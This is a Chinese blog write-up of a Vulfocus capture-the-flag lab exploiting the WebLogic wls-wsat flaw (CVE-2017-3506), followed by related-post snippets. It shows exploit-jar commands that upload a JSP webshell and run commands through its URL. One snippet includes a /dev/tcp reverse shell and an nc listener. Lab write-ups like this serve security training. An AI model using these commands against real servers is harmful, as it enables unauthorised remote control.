【Vulfocus】weblogic wls-wsat组件远程命令执行(CVE-2017-3506)漏洞复现

原创 已于 2024-09-26 16:39:02 修改 · 1.1k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全性测试

于 2024-09-26 16:22:40 首次发布

一、漏洞介绍

1.靶场地址:https://vulfocus.cn/

2.名称:weblogic wls-wsat组件远程命令执行(CVE-2017-3506)

3.漏洞描述:Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。

4.漏洞影响:
OracleWebLogic Server10.3.6.0.0
OracleWebLogic Server12.1.3.0.0
OracleWebLogic Server12.2.1.1.0
OracleWebLogic Server12.2.1.2.0

二、复现过程

1.启动靶场,得到IP和端口资产信息
在这里插入图片描述
2.利用工具cve-2017-3506_webshell.jar(在本文顶部获取资源下载),验证漏洞是否存在并利用

java -jar cve-2017-3506_webshell.jar -u http://123.58.224.8:64237

在这里插入图片描述
3.显示漏洞存在,上传木马,payload如下

java -jar cve-2017-3506_webshell.jar -s http://123.58.224.8:64237 /wls-wsat/CoordinatorPortType11 shell1.jsp

在这里插入图片描述
4.成功反弹shell,将http://123.58.224.8:64237/wls-wsat/shell1.jsp?password=secfree&command=whoami复制粘贴到浏览器访问试试
在这里插入图片描述
5.成功执行,根据题目提示flag存在于/tmp中,改成ls /tmp试试,即http://123.58.224.8:64237/wls-wsat/shell1.jsp?password=secfree&command=ls /tmp
在这里插入图片描述
6.得到flag,提交验证,恭喜通过。
在这里插入图片描述

三、修复建议

Oracle官方已经在关键补丁更新中修复了此漏洞,受影响的用户请尽快升级更新进行防护。

Vulfocus复现Spring框架远程命令执行漏洞(CNVD-2022-23942)
Aquarius_ego的博客
05-16 2033
Vulfocus复现Spring框架远程命令执行漏洞(CNVD-2022-23942)/spring-core-rce-2022-03-29
WebLogic 相关漏洞复现合集
weixin_57682301的博客
08-06 336
2.默认账号密码:weblogic/Oracle@123 输入并登录。5.上传war包,jsp木马压缩成zip,修改后缀为war,上传。1.搭建环境进入,在url后加/console可以进入登录页面。7.上传完成后访问你植入的木马,没有报错证明注入成功。8.使用哥斯拉进行连接测试测试成功。3.进入后点击部署--安装。
Weblogic xmlDecoder反序列化漏洞
buffedon的博客
08-04 2176
Weblogic xmlDecoder反序列化漏洞Weblogic xmlDecoder漏洞分析CVE-2017-3506CVE-2017-10271环境搭建漏洞探测漏洞利用其他PoC Weblogic xmlDecoder CVE-2017-10271 影响版本 Weblogic < 10.3.6 ‘wls-wsat’ XMLDecoder 反序列化漏洞CVE-2017-10271) Oracle WebLogic Server12.2.1.1 Oracle WebLogic Server12.2
weblogic wls-wsat组件远程命令执行CVE-2017-3506
Cherish what you have!
11-22 540
Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。
weblogic漏洞分析之CVE-2017-10271
洋洋的小黑屋
08-17 1754
weblogic漏洞分析之CVE-2017-10271 一、环境搭建 1)配置docker 这里使用vulhub的环境:CVE-2017-10271 编辑docker-compose.yml文件,加入8453端口 version: '2' services: weblogic: image: vulhub/weblogic:10.3.6.0-2017 ports: - "7001:7001" - "8453:8453" 启动docker docker-compose
Weblogic WLS组件REC漏洞(CVE-2017-10271)利用脚本
09-30
Weblogic wls-wsat组件反序列化漏洞(CVE-2017-10271)利用脚本。 命令执行并回显 直接上传shell 在linux下weblogic 10.3.6.0测试OK 使用方法及参数 python weblogic_wls_wsat_exp.py -t 172.16.80.131:7001 usage: ...
Pocsuite3复现Weblogicwls-wsat‘ XMLDecoder 反序列化漏洞(CVE-2017-10271)
jstang的博客
04-15 4261
目录 一、安装pocsuite库 二、启动漏洞环境 三、编写poc脚本(poc.py) 四、主程序调用 五、执行输出 一、安装pocsuite库 pip3 install pocsuite3==1.6.6 二、启动漏洞环境 docker run -itd --name weblogic -p 7001:7001 vulhub/weblogic:10.3.6.0-2017 三、编写poc脚本(poc.py) import re import time import base64 import soc
Weblogic-Weblogic反序列化漏洞复现CVE-2017-10271)
Litbai_zhang
06-27 626
环境配置 1.安装docker 1. curl https://download.docker.com/linux/centos/docker-ce.repo -o /etc/yum.repos.d/docker-ce.repo 2. yum install https://download.docker.com/linux/fedora/30/x86_64/stable/Packages/containerd.io-1.2.6-3.3.fc30.x86_64.rpm 3. yum
vulfocus[weblogic反序列化]
qq_44122254的博客
02-18 3927
名称: vulfocus/weblogic-cve_2017_10271:latest 描述: Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件WeblogicWLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,
【精选】WebLogic-CVE-2017-3506
人若无名,便可专心练剑
12-06 1198
记得要在WebLogic-XMLDecoder.jar文件中的目录下进行执行,要不然会报错。用123替换下burp里面的内容,然后进行测试下。先进行检测下漏洞是否存在。
Oracle WebLogic Server WebLogic WLS组件远程命令执行漏洞 CVE-2017-10271
qq_42430287的博客
12-22 1520
2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。但近期有安全研究者发现JBOSSAS 6.x也受该漏洞影响,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。在 Red Ha
webLogic反序列化漏洞CVE-2017-3506
2401_82451607的博客
09-22 750
webLogic反序列化漏洞CVE-2017-3506
WebLogic漏洞复现(附带修复方法)
C233333235的博客
08-07 2860
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,默认端口:7001WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
CVE-2017-3506 Weblogic 远程代码执行
weixin_53639243的博客
01-29 704
CVE-2017-3506 Weblogic 远程代码执行
vulfocus靶场jenkins代码执行漏洞cve-1027-1000353
没有故事
04-23 522
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,上一步生成的base64编码}|{base64,-d}|{bash,-i}"python3 exploit.py http://受害者IP:端口 jenkins_poc.ser。bash -i >& /dev/tcp/监听机的IP/端口 0>&1。攻击机监听: nc -lvp 4444。GitCode - 开发者的代码家园。
vulfocus复现:Spring Framework 远程命令执行漏洞
woai_zhongguo的博客
07-18 1689
vulfocus复现:Spring Framework 远程命令执行漏洞
Weblogic-wls-wsat-unserialize_CVE-2017-10271
来日可期的博客
12-09 1319
简介:RMI通信时会将数据进行序列化后进行传输,同样的接收数据后反序列化进行接收,正常RMI通信使用的是JRMP协议,而在Weblogic的RMI通信中使用的是T3协议。T3协议是Weblogic独有的一个协议,相比于JRMP协议多了如下的一些特性。主要包含请求包头和请求主体这两部分内容,总共分为七个部分,第一部分是协议头,也就是请求包头,后面2-7都是请求主体。然后发送如下数据包(注意其中反弹shell的语句,需要进行编码,否则解析XML的时候将出现格式错误)修改数据包,进行URL编码,然后进行发送。
(2022年12月最新)最详细vulfocus靶场 Log4j2远程命令执行漏洞复现
qq1140037586的博客
12-15 1374
1、向目标发送指定payload,目标对payload进行解析执行,然后会通过ldap链接远程服务,当ldap服务收到请求之后,将请求进行重定向到恶意 java class的地址。 2、目标服务器收到重定向请求之后,下载恶意class并执行其中的代码,从而执行系统命令。
weblogic 禁止 /_async/*,/wls-wsat/*路径的 URL 访问
最新发布
04-01
### 配置 WebLogic 以禁用 `_async` 和 `wls-wsat` 路径 为了防止潜在的安全风险,可以通过配置 ACL 或者修改 Apache 的 `.htaccess` 文件来阻止对 `/ _async/ **` 及 `/ wls-wsat/ **` 路径的访问。以下是具体的实现方法: #### 方法一:通过 WebLogic 自身的 ACL 功能 在公网部署的 WebLogic 服务器上,可以启用 ACL 来限制特定路径的访问权限。此功能允许管理员定义哪些 IP 地址或网络范围能够访问某些资源[^1]。 具体操作如下: - 登录到 WebLogic 控制台。 - 导航至安全领域设置部分。 - 创建一个新的 ACL 规则,指定拒绝所有来自外部网络对该路径的请求。 - 将规则应用于目标路径 `/ _async/*` 和 `/ wls-wsat/*`. #### 方法二:使用 Apache HTTP Server 进行目录级控制 如果前端有 Apache HTTP Server,则可以在其配置文件中加入以下内容来屏蔽这些敏感路径: ```apache <DirectoryMatch "^/_async(/.*)?$"> Order allow,deny Deny from all </DirectoryMatch> <DirectoryMatch "^/wls-wsat(/.*)?$"> Order allow,deny Deny from all </DirectoryMatch> ``` 上述代码片段展示了如何利用 `<DirectoryMatch>` 指令精确匹配并封锁两个危险端点[^2]。 另外需要注意的是,由于存在 CVE-2017-3506 这样的已知漏洞影响到了 Oracle WebLogic Server 版本 12.2.1.2.0 ,因此除了简单的 URL 屏蔽外还建议及时更新补丁程序或者应用其他防护措施比如 WAF(Web Application Firewall)[^3]。 最终目的是确保即使攻击者尝试访问受保护区域也无法成功获取任何响应数据从而有效降低被入侵的可能性。 ```bash # 更新系统补丁命令示例 (假设为 Linux 平台) sudo yum update weblogic-server -y ``` 以上就是关于如何在 WebLogic 中禁用 `_async` 和 `wls-wsat` 路径的方法介绍。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

JavaLord123

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值